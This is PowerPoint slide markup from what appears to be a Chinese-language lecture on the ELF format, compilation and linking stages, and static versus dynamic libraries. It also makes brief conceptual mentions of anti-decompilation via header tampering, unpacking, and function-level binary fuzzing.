              <a:t>ELF Header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，搅乱反编译。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>脱壳：将其从内存中复制出来并进行重建，重建的过程可根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行还原，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之间共享了许多内存空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Binary Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>单独对这个函数进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：修改目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件，并且将对应的静态函数导出添加到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dynamic section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中，并修复对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>头，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>bin2lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>技术。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:sym typeface="+mn-ea"/>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412875"/>
            <a:ext cx="12192000" cy="260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2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4102100" y="2540000"/>
            <a:ext cx="3987800" cy="1482725"/>
            <a:chOff x="2682875" y="2071687"/>
            <a:chExt cx="3986483" cy="1482725"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61446" name="TextBox 1"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2682875" y="2311106"/>
              <a:ext cx="3525324" cy="101566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6000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="8F000B"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>THANKS</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="6000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="8F000B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="空心弧 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="7086271">
              <a:off x="5186878" y="2071932"/>
              <a:ext cx="1482725" cy="148223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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177925" y="1443990"/>
            <a:ext cx="9632315" cy="4707890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>汇编阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>      将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件翻译成机器语言指令，把这些指令打包成一种叫做可重定位目标程序的格式，并将结果保存在目标文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对应的命令有：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hello.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hello.o</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>链接阶段：   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    此时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>程序调用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数存在于一个名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>printf.o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的单独的预编译目标文件中。 链接器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）就负责处理把这个文件并入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hello.o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>程序中，结果得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件，一个可执行文件。最后可执行文件加载到储存器后由系统负责执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数库一般分为静态库和动态库两种。静态库是指编译链接时，把库文件的代码全部加入到可执行文件中，因此生成的文件比较大，但在运行时也就不再需要库文件了。其后缀名一般为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。动态库与之相反，在编译链接时并没有把库文件的代码加入到可执行文件中，而是在程序执行时由运行时链接文件加载库，这样可以节省系统的开销。动态库一般后缀名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在编译时默认使用动态库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838202" y="1457325"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在经过汇编器和连接器作用后都会输出一个目标文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这个目标文件就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件的三种文件类型：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>      可重定位目标文件：包含二进制代码和数据，其形式可以和其他目标文件进行合并，创建一个可执行目标文件。比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>      可执行目标文件：包含二进制代码和数据，可直接被加载器加载执行。 比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>      共享目标文件：可被动态的加载和链接，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116679" y="3059301"/>
            <a:ext cx="7959213" cy="3035877"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1349375" y="1035050"/>
            <a:ext cx="9047480" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     目标文件在不同的系统或平台上具有不同的命名格式，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>X86-64 Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ELF(Executable and Linkable Format, ELF)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>目标文件既要参与程序链接，又要参与程序执行。所以我们通过两种视图的角度来分析该文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1329055" y="1136015"/>
            <a:ext cx="9702165" cy="5262245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件开始处，是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>头部（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ELF Header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>），用来描述整个文件的组织。节区部分包含链接视图的大量信息：指令、数据、符号表、重定位信息等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
